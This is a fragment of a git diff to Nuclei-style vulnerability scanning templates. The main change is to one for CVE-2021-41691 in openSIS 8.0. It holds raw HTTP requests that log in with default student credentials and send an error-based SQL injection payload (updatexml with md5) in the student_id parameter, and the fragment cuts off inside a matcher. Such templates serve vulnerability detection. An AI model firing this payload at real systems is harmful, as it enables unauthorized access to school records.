4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + matchers: + - type: dsl + dsl: + - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')" + - "status_code==200" + condition: and \ No newline at end of file diff --git a/poc/cve/cve-2021-41691.yaml b/poc/cve/cve-2021-41691.yaml index 2157dc2b57..8c322f61ff 100644 --- a/poc/cve/cve-2021-41691.yaml +++ b/poc/cve/cve-2021-41691.yaml @@ -4,24 +4,16 @@ info: name: openSIS Student Information System 8.0 SQL Injection author: Bartu Utku SARP severity: high - description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. - remediation: | - Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). + description: "openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php." reference: - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - https://www.exploit-db.com/exploits/50637 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 classification: cve-id: CVE-2021-41691 - metadata: - max-request: 2 - tags: cve,cve2021,sqli,auth,edb,opensis -variables: - num: "999999999" + tags: cve,cve2021,opensis,sqli,auth -http: +requests: - raw: - | POST /index.php HTTP/1.1 @@ -30,24 +22,30 @@ http: Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + - | POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: username: - student + password: - student@123 + + req-condition: true + cookie-reuse: true matchers: - type: dsl dsl: - 'contains(body_2, "